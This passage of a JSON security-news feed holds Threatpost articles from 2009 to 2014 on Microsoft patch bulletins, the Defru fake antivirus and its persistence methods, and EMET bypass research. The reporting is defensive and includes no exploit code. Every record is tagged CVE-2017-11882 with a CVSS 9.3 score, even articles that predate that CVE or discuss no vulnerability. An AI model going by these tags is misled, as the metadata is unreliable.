We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:49", "description": "[](<https://threatpost.com/microsoft-warning-xp-users-update-flash-player-now-011210/>)Microsoft has shipped a security advisory with an urgent message for Windows XP users: Update your Flash Player immediately.\n\nThe Adobe Flash Player 6 that ships by default in Windows XP is vulnerable to multiple code execution vulnerabilities that could lead to PC takeover attacks, according to the advisory.\n\n \nHere\u2019s [the warning](<http://www.microsoft.com/technet/security/advisory/979267.mspx>):\n\n> Microsoft is aware of reports of vulnerabilities in Adobe Flash Player 6 provided in Windows XP. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time but recommend that users install the latest version of Flash Player provided by Adobe.\n> \n> The Adobe Flash Player 6 was provided with Windows XP and contains multiple vulnerabilities that could allow remote code execution if a user views a specially crafted Web page. Adobe has addressed these vulnerabilities in newer versions of Adobe Flash Player. 
Microsoft recommends that users of Windows XP with Adobe Flash Player 6 installed update to the most current version of Flash Player available from Adobe.\n\nThis issue affects Windows XP Service Pack 2 and Windows XP Service Pack 3. The warning is also applicable to users running Windows XP Professional x64 Edition Service Pack 2.\n\nAdobe discontinued support for Adobe Flash Player 6 in 2006. The [latest version of Adobe Flash Player](<http://get.adobe.com/flashplayer/>) is 10.0.42.34.\n\nAdobe Flash Player is among the most commonly exploited desktop applications so it\u2019s important for all Windows XP users to heed this warning from Microsoft.\n", "cvss3": {}, "published": "2010-01-12T21:34:16", "type": "threatpost", "title": "Microsoft warning to XP users: Update Flash Player Now", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:44:27", "id": "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "href": "https://threatpost.com/microsoft-warning-xp-users-update-flash-player-now-011210/73362/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. 
Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. 
Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe 
MMPC says that once a user machine is compromised by one such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. 
The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. \u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. 
All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making it so attractive for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. 
Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), includes a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as a favorite exploit for attackers.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built into the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user open a malicious Microsoft Office file that invokes a resource in the Media Center. 
This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities, and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePoint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. 
Both bugs require certain circumstances be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. 
With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. 
Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique in use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build a ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. 
\u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. 
\u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. 
More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nAn IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. 
\u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months.\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. 
An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. 
Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all of which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002 will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). 
The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. 
The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SignalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. 
\u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. 
